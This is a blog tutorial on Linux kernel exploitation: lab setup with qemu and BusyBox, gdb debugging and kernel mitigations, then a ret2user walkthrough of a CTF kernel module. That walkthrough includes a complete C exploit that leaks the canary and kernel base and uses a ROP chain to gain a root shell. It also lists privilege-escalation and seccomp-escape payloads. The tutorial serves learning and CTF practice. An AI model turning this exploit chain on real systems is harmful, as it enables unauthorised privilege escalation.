santaclz's blog

Linux Kernel Exploitation: Getting started & BOF

03 Nov 2023


Table of contents

  • What are the goals of exploitation?
  • Setup
  • Debugging
  • Shellcoding
  • Kernel modules
  • Mitigations
  • Ret2user
  • Video
  • References



    Motivation

    I started my journey into Linux kernel exploitation for the following reasons:

    • To improve my knowledge of the Linux kernel
    • To write exploits for real-world bugs
    • To research IoT devices running modified Linux kernels
    • To pwn Google’s kCTF platform
    • To get invited to conferences :)

    Where are kernel exploits used?

    Kernel exploits are used (to my knowledge) by the following groups of people:

    • Threat actors: to escalate privileges
    • Pentesters: to demonstrate impact
    • Defenders: to come up with detections and mitigations
    • Kernel / driver developers: to write patches
    • Android / iOS superusers: to customize phones

    Linux kernel oversimplified

    The Linux kernel is a layer between user applications and hardware. It manages the CPU, memory, devices, file systems, networking, process control and much more. It’s a complex project with well over 20 million lines of code, and it’s still evolving. Such a dynamic project is an ideal research target.

    Kernelspace vs Userspace exploitation (x86_64)

    If you’re coming from userspace exploitation (like me) you may notice the following differences when writing kernel exploits.

    More instructions

    Code running in ring 0 can execute privileged instructions such as:

    • LGDT - Loads the base address and limit of the GDT into GDTR
    • LLDT - Loads a segment selector for the LDT into LDTR
    • LTR - Loads a segment selector into the Task Register (TR)
    • MOV Control Register - Copy data and store in Control Registers
    • LMSW - Load Machine Status Word
    • CLTS - Clear Task Switch Flag in Control Register CR0
    • MOV Debug Register - Copy data and store in debug registers
    • INVD - Invalidate Cache without writeback
    • INVLPG - Invalidate TLB Entry
    • WBINVD - Invalidate Cache with writeback
    • HLT - Halt Processor
    • RDMSR - Read Model Specific Registers (MSR)
    • WRMSR - Write Model Specific Registers (MSR)
    • RDPMC - Read Performance Monitoring Counter
    • RDTSC - Read time Stamp Counter

    Not all of these are strictly kernel-only. RDTSC, for example, can also be executed from userspace as long as the TSD flag in register CR4 is not set.
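
    To see the RDTSC exception in practice, here is a minimal sketch that reads the time stamp counter from an ordinary userspace process. The helper name read_tsc is my own, and the non-x86 fallback only exists so the snippet compiles everywhere. It assumes CR4.TSD is clear, which is the usual situation on Linux; with TSD set the instruction would fault instead.

```c
#include <stdint.h>

/* Read the time stamp counter from ring 3.
 * Assumes CR4.TSD is clear; otherwise RDTSC raises a fault in userspace. */
static uint64_t read_tsc(void)
{
#if defined(__x86_64__) || defined(__i386__)
    uint32_t lo, hi;

    /* RDTSC returns the low 32 bits in EAX and the high 32 bits in EDX. */
    __asm__ volatile("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
#else
    return 0; /* RDTSC is x86-only; fallback keeps the sketch compilable */
#endif
}
```

    Calling read_tsc() twice in a row from main should give two increasing values. Trying the same with an instruction like HLT or WRMSR would kill the process instead.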

    More registers

    When debugging the kernel with gdb we can see additional registers:

    • fs_base - base address of fs
    • gs_base - base address of gs
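    • k_gs_base - the KERNEL_GS_BASE MSR; the swapgs instruction exchanges it with gs_base when switching from userspace to kernelspace or vice versa
    • cr0 - control register with the basic mode flags (protected mode, paging, write protect)
    • cr2 - holds the faulting linear address after a page fault
    • cr3 - holds the physical address of the top-level page table
    • cr4 - control register with feature flags (for example TSD, SMEP and SMAP)
    • cr8 - task priority register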
    • efer - Extended Feature Enable Register
    • mxcsr - control and status for SSE registers
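
    When you read cr4 in gdb you get a raw number, so it helps to know which bits matter for exploitation. Below is a small sketch that decodes the flags mentioned in this post. The bit positions come from the Intel manual; the helper names are my own.

```c
#include <stdbool.h>
#include <stdint.h>

/* CR4 bit positions as documented in the Intel SDM. */
#define CR4_TSD  (1ULL << 2)   /* time stamp disable: RDTSC is ring 0 only */
#define CR4_SMEP (1ULL << 20)  /* supervisor mode execution prevention */
#define CR4_SMAP (1ULL << 21)  /* supervisor mode access prevention */

static bool cr4_smep_enabled(uint64_t cr4) { return (cr4 & CR4_SMEP) != 0; }
static bool cr4_smap_enabled(uint64_t cr4) { return (cr4 & CR4_SMAP) != 0; }

/* RDTSC is allowed in userspace only while TSD is clear. */
static bool cr4_user_rdtsc_allowed(uint64_t cr4) { return (cr4 & CR4_TSD) == 0; }
```

    For example, a cr4 value of 0x300000 has both SMEP and SMAP set, while 0x100000 has only SMEP.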

    What are the goals of exploitation?

    The goal usually revolves around gaining higher privileges on the system or gaining persistence.

    Some of the goals can be:

    Get root

    • payload: commit_creds(prepare_kernel_cred(0))

    Escape SECCOMP

    • payload: current->thread_info.flags &= ~(1 << TIF_SECCOMP)

    Run single command

    • payload: run_cmd("/path_to_command")
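
    The SECCOMP payload above is just a bit-clear on the thread flags. Here is a userspace sketch of the same operation on a plain integer, so you can see what happens to the value. The bit number 8 is an assumption based on older x86_64 kernels; newer kernels may track seccomp elsewhere, so check the headers of your target before relying on it.

```c
/* Assumption: TIF_SECCOMP is bit 8, as in older x86_64 kernels
 * (see arch/x86/include/asm/thread_info.h of your target version). */
#define TIF_SECCOMP 8

/* Return `flags` with the seccomp bit cleared and all other bits intact. */
static unsigned long clear_seccomp_flag(unsigned long flags)
{
    return flags & ~(1UL << TIF_SECCOMP);
}
```

    With flags equal to 0x104 the result is 0x4: only the seccomp bit is dropped.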

    Setup

    Install prerequisites

    sudo apt install -y bison flex libelf-dev cpio build-essential libssl-dev qemu-system-x86 libncurses-dev
    

    Build the Linux kernel with debug symbols

    git clone https://github.com/torvalds/linux # or download specific kernel version from https://mirrors.edge.kernel.org/pub/linux/kernel/
    cd linux && make defconfig && make menuconfig
    # Ensure that kernel hacking --> Compile-time checks and compiler options --> Compile the kernel with debug symbols is checked.
    make -j$(nproc)
    # The bootable kernel image ends up in arch/x86/boot/bzImage
    

    Build BusyBox

    Download and decompress busybox (I chose the latest version at the time).

    wget https://busybox.net/downloads/busybox-1.36.1.tar.bz2
    tar xvf busybox-1.36.1.tar.bz2
    

    Build it.

    cd busybox-1.36.1
    make defconfig
    make menuconfig
    

    In the Busybox Settings menu, select Build Options, and check the box next to Build BusyBox as a static binary (no shared libs). Next, specify the output folder.

    make
    make CONFIG_PREFIX=./../busybox_rootfs install
    

    Build initramfs

    Create a directory hierarchy for initramfs.

    mkdir -p initramfs/{bin,dev,etc,home,mnt,proc,sys,usr,tmp}
    cd initramfs/dev
    sudo mknod sda b 8 0 
    sudo mknod console c 5 1
    

    Copy everything from the busybox_rootfs folder to the initramfs folder. Next, create an init file in the root of initramfs, and write the following into it:

    #!/bin/sh
    
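    # Mount the pseudo filesystems the shell tools expect
    mount -t proc none /proc
    mount -t sysfs none /sys
    
    /bin/mount -t devtmpfs devtmpfs /dev
    chown 1337:1337 /tmp
    
    # Drop to an unprivileged shell (uid/gid 1337) with a controlling tty
    setsid cttyhack setuidgid 1337 sh
    
    # Fall back to a root shell once the unprivileged shell exits
    exec /bin/sh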
    

    Make the script executable.

    chmod +x init
    

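    Create the initramfs archive itself. Run this from the root of the initramfs directory and write the archive to the parent directory, so that the archive does not end up inside itself.

    find . -print0 | cpio --null -ov --format=newc > ../initramfs.cpio 
    gzip ../initramfs.cpio
    

    This creates the initramfs.cpio.gz file in the parent directory, which we will use as the filesystem for our qemu emulated Linux kernel.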

    Run with qemu

    qemu-system-x86_64 \
        -m 512M \
        -nographic \
        -kernel bzImage \
        -append "console=ttyS0 loglevel=3 oops=panic panic=-1 nopti nokaslr" \
        -no-reboot \
        -cpu qemu64 \
        -smp 1 \
        -monitor /dev/null \
        -initrd initramfs.cpio.gz \
        -net nic,model=virtio \
        -net user \
        -gdb tcp::1234 \
        -S
    

    The -gdb tcp::1234 flag starts a gdbstub listener on port 1234. The -S flag keeps the CPU halted at startup until execution is resumed, for example with continue from an attached gdb.

    Debugging

    For debugging, run the qemu instance with the -gdb and -S flags. Then open gdb in another terminal (loading the vmlinux file from the kernel build tree gives you symbols) and type:

    target remote :1234
    

    As for gdb extensions, use whichever one works for you. I use gef, although most things can be accomplished with plain gdb.

    Shellcoding

    If you know what you want to accomplish in code but don’t know how to do it at the assembly level, write a kernel module, compile it and dump the disassembly.

    objdump -M intel -d test.ko
    

    Kernel modules

    Kernel modules are pieces of code that can be loaded into and unloaded from the kernel on the fly, without rebooting the system. They are a great starting point for learning kernel exploitation because they run with kernel privileges.

    To load a kernel module you can use:

    sudo insmod <module_name.ko>
    

    To unload a kernel module:

    sudo rmmod <module_name>
    

    To list currently loaded modules:

    lsmod
    

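    A kernel module that exposes a device or /proc file registers a struct usually called fops (file operations), which specifies the handlers that run when userspace calls read, write, open, close or ioctl on that file. Note that close is handled by the .release callback.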

    static struct file_operations module_fops =
    {
        .owner   = THIS_MODULE,
        .read    = module_read,
        .write   = module_write,
        .open    = module_open,
        .release = module_close,
    };
    

    We can start auditing each of these functions in our search for bugs.
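
    To make the mapping between syscalls and handlers concrete, here is a minimal userspace sketch. The helper name read_from_device is my own. Each call in it lands in one of the handlers from the struct above: open() in .open, read() in .read and close() in .release.

```c
#include <fcntl.h>
#include <stddef.h>
#include <sys/types.h>
#include <unistd.h>

/* Open a device file, read up to `len` bytes and close it again.
 * Returns the number of bytes read, or -1 if open() or read() failed. */
static ssize_t read_from_device(const char *path, void *buf, size_t len)
{
    int fd = open(path, O_RDONLY);   /* dispatched to the driver's .open */
    if (fd < 0)
        return -1;

    ssize_t n = read(fd, buf, len);  /* dispatched to the driver's .read */
    close(fd);                       /* last close triggers .release */
    return n;
}
```

    You can try it against /dev/zero first. Against a vulnerable module, the len argument is exactly the attacker-controlled size that the handler has to validate.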

    Mitigations

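    • KASLR - randomizes the base address of the kernel at boot (the kernel counterpart of userspace ASLR)
    • FG-KASLR - randomizes the placement of individual functions, so a single leaked address no longer reveals all the others
    • Kernel Stack Canary - a secret value placed on the stack before the return address and checked before the function returns, which stops stack buffer overflows unless the value is leaked (same as userspace)
    • SMEP - Supervisor Mode Execution Prevention prevents the kernel from executing code located in userspace memory
    • SMAP - Supervisor Mode Access Prevention prevents the kernel from reading or writing userspace memory, except where it is explicitly allowed
    • KPTI - Kernel Page Table Isolation gives userspace its own set of page tables with almost no kernel mappings; it is a mitigation against the Meltdown CPU bug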

    More mitigations can be found at https://github.com/a13xp0p0v/linux-kernel-defence-map
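
    Before writing an exploit it is worth checking which of these mitigations are active on the target. SMEP and SMAP show up as smep and smap in the flags line of /proc/cpuinfo, and nokaslr or nopti show up in /proc/cmdline when they were passed at boot. Below is a small sketch of a whole-word matcher you could run over those lines. The helper name has_token is my own.

```c
#include <stdbool.h>
#include <string.h>

/* Return true if `word` appears in `line` as a whole token,
 * delimited by spaces, tabs, newlines or the string boundaries. */
static bool has_token(const char *line, const char *word)
{
    size_t wlen = strlen(word);
    const char *p = line;

    if (wlen == 0)
        return false;

    while ((p = strstr(p, word)) != NULL) {
        bool starts = (p == line) || p[-1] == ' ' || p[-1] == '\t';
        bool ends = p[wlen] == '\0' || p[wlen] == ' ' || p[wlen] == '\n';

        if (starts && ends)
            return true;
        p += 1; /* partial match, keep searching after this position */
    }
    return false;
}
```

    For the qemu command line used in this post, has_token(cmdline, "nokaslr") would return true, which tells you KASLR is off in that setup.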

    Ret2user

    Let’s take a look at the ret2user technique which is commonly used to escalate privileges. For this example I chose a challenge from K3RN3LCTF 2021 called easy_kernel which can be downloaded here: https://github.com/seal9055/seal9055.github.io/blob/main/docs/kernel/kernel_rop.tar.gz

    Vulnerability analysis

    As I mentioned before, kernel modules are a great way to start learning Linux kernel exploitation. In this challenge we are provided with a vulnerable kernel module, vuln.ko, along with its source code in vuln.c.

    Analyzing the s_read function, we notice a fixed-size message buffer.

    static ssize_t s_read(struct file *file, char __user *ubuf, size_t size, loff_t *offset)
    {
        char message[40];
    
        strcpy(message, "Welcome to this kernel pwn series");
    
        if (raw_copy_to_user(ubuf, message, size) == 0) {
            printk(KERN_ALERT "%ld bytes read by device\n", size);
        }
        else {
            printk(KERN_ALERT "Some error occured in read\n");
        }
    
        return size;
    }
    

    If we request more than 40 bytes, the copy runs past the end of the message buffer and hands adjacent kernel stack contents to userspace (an out-of-bounds read). This leak is useful for bypassing KASLR and Kernel Stack Canaries.
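
    Turning the leaked bytes into usable values is simple arithmetic. Here is a sketch that pulls the canary and the kernel base out of the leaked qwords. The indices 5 and 7 and the offset 0x25de2e are the ones used by the exploit later in this post, so they are specific to this challenge build. The struct and function names are my own.

```c
#include <stddef.h>

/* Challenge-specific assumptions, taken from the exploit in this post. */
#define CANARY_IDX      5           /* first qword after the 40-byte buffer */
#define RET_ADDR_IDX    7           /* saved return address */
#define RET_ADDR_OFFSET 0x25de2eUL  /* leaked return address minus kernel base */

struct leak {
    unsigned long canary;
    unsigned long kernel_base;
};

/* Extract canary and kernel base from `count` leaked qwords.
 * Returns 0 on success, -1 if the leak is too short. */
static int parse_leak(const unsigned long *qwords, size_t count, struct leak *out)
{
    if (count <= RET_ADDR_IDX)
        return -1;

    out->canary = qwords[CANARY_IDX];
    out->kernel_base = qwords[RET_ADDR_IDX] - RET_ADDR_OFFSET;
    return 0;
}
```

    A leaked return address of 0xffffffff8125de2e would give a base of 0xffffffff81000000, which is what you expect to see when KASLR is disabled.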

    Analyzing the s_write function, we notice that it is similar, but instead of reading from the buffer we write values into it.

    static ssize_t s_write(struct file *file, const char __user *ubuf, size_t size, loff_t *offset)
    {
        char buffer[40];
    
        if (raw_copy_from_user(buffer, ubuf, size) == 0) {
            printk(KERN_ALERT "%ld bytes written to device\n", size);
        }
        else {
            printk(KERN_ALERT "Some error occured in write\n");
        }
    
        return size;
    }
    

    By calling this function with more than 40 bytes, we trigger a stack buffer overflow.
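
    To know what exactly we overwrite, it helps to picture the stack frame as a struct. The layout below is an assumption inferred from the qword indices the exploit in this post uses (canary at 5, return address at 7); the real layout depends on the compiler and kernel config. All names are my own.

```c
#include <stddef.h>

/* Assumed stack frame of s_write, lowest address first. */
struct assumed_frame {
    char          buffer[40];   /* qwords 0..4, the overflowed buffer */
    unsigned long canary;       /* qword 5, must be rewritten unchanged */
    unsigned long saved_reg;    /* qword 6, treated as padding */
    unsigned long return_addr;  /* qword 7, start of the ROP chain */
};

/* Index of a field when the frame is viewed as an unsigned long array. */
#define QWORD_INDEX(field) \
    (offsetof(struct assumed_frame, field) / sizeof(unsigned long))
```

    So a write of 64 bytes or more reaches the return address, and everything after qword 7 becomes the rest of the chain.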

    Exploitation

    We have everything we need to start writing an exploit. Since the initramfs has no libc, we compile the exploit statically (for example with gcc -static) and pack it into the initramfs file system.

    This is the plan for writing an exploit:

    1. Register a SIGSEGV signal handler for the KPTI bypass (returning with iretq while the kernel page tables are still active makes the process segfault in userspace; the handler then runs with the already elevated credentials)
    2. Leak the Kernel Stack Canary
    3. Leak a kernel address to bypass KASLR
    4. Save state for switching context between user-land and kernel-land (save registers for restoring them later)
    5. Write a ROP chain to bypass SMEP (Execution Prevention) and trigger the buffer overflow
    6. Get a shell with system("/bin/sh")
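
    The state-saving step from the plan can also be written with extended inline assembly, which does not depend on how the binary is linked. This is a minimal sketch for x86_64 with GCC or Clang, not the version used in the exploit below. It uses __readeflags() from x86intrin.h to avoid pushing onto the stack inside inline assembly.

```c
#include <x86intrin.h> /* __readeflags(), available in GCC and Clang on x86 */

static unsigned long user_cs, user_ss, user_rsp, user_rflags;

/* Capture the values that iretq will later pop when returning to userspace:
 * code segment, stack segment, stack pointer and flags. */
static void save_state(void)
{
    __asm__ volatile("mov %%cs, %0" : "=r"(user_cs));
    __asm__ volatile("mov %%ss, %0" : "=r"(user_ss));
    __asm__ volatile("mov %%rsp, %0" : "=r"(user_rsp));
    user_rflags = __readeflags();
}
```

    Call save_state() once before triggering the overflow. The low two bits of the saved cs and ss are 3, which is the ring we want iretq to return to.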

    Below is an example exploit that uses the ret2user technique and bypasses KASLR, the Kernel Stack Canary, SMEP, SMAP and KPTI:

    #include <fcntl.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    
    void spawn_shell() {
        puts("[+] Returned to userland");
    
        if (getuid() == 0) system("/bin/sh");
        else puts("[-] Not root");
    }
    
    unsigned long user_cs, user_ss, user_rflags, user_rsp;
    int main() {
        // KPTI bypass
        signal(SIGSEGV, spawn_shell);
    
        int fd = open("/proc/pwn_device", O_RDWR);
        if (fd < 0) {
            puts("[-] Failed to open device");
            exit(1);
        }
        puts("[+] Opened device");
    
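        // Leak: s_read copies `size` bytes out of a 40-byte stack buffer,
        // so reading 64 bytes also returns the canary and a return address
        unsigned long buff[80] = {0};
        if (read(fd, buff, 64) != 64) {
            puts("[-] Leak failed");
            exit(1);
        }
    
        unsigned long cookie = buff[5];          // qword right after the buffer
        unsigned long base = buff[7] - 0x25de2e; // offset specific to this kernel build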
        printf("[+] Leaked cookie: 0x%lx\n", cookie);
        printf("[+] Leaked base: 0x%lx\n", base);
    
        // Save state
        __asm__(
            ".intel_syntax noprefix;"
            "mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_rsp, rsp;"
            "pushf;"
            "pop user_rflags;"
            ".att_syntax;"
        );
    
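        // Overflow: qwords 0-4 fill the buffer, 5 is the canary,
        // 6 is padding and 7 overwrites the return address
        unsigned long payload[40] = {[0 ... 39] = 0x4141414141414141};
        int i = 5;
        payload[i] = cookie;
        ++i;
        payload[++i] = base + 0x001778; // pop rdi; ret; 
        payload[++i] = 0x0;             // rdi = 0
        payload[++i] = base + 0x08c340; // prepare_kernel_cred
        // commit_creds takes the new cred in rdi. This chain assumes rdi still
        // holds it after prepare_kernel_cred returns on this build; otherwise
        // a "mov rdi, rax" gadget would be needed here.
        payload[++i] = base + 0x08bf00; // commit_creds
        payload[++i] = base + 0xc00f58; // swapgs; ret; 
        payload[++i] = base + 0x024952; // iretq; ret; 
        // iretq frame: rip, cs, rflags, rsp, ss
        payload[++i] = (unsigned long)spawn_shell; // userland rip
        payload[++i] = user_cs;
        payload[++i] = user_rflags;
        payload[++i] = user_rsp;
        payload[++i] = user_ss;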
    
        write(fd, payload, sizeof payload);
    
        return 0;
    }
    

    Video

    Below is a video of a talk I gave at BSidesLjubljana in June 2023.

    References

    https://medium.com/@kiky.tokamuro/creating-initramfs-5cca9b524b5a

    https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/

    https://sam4k.com/linternals-memory-allocators-0x02/

    https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/

    https://seal9055.com/blog/kernel/return_oriented_programming

    https://breaking-bits.gitbook.io/breaking-bits/exploit-development/linux-kernel-exploit-development/kernel-page-table-isolation-kpti#kpti-trampoline

    https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628

    https://pwn.college/system-security/kernel-security

    https://github.com/google/syzkaller/

    https://research.nccgroup.com/2018/09/11/ncc-groups-exploit-development-capability-why-and-what/

    https://lwn.net/Articles/824307/

    https://meltdownattack.com/meltdown.pdf

    http://www.brokenthorn.com/Resources/OSDev23.html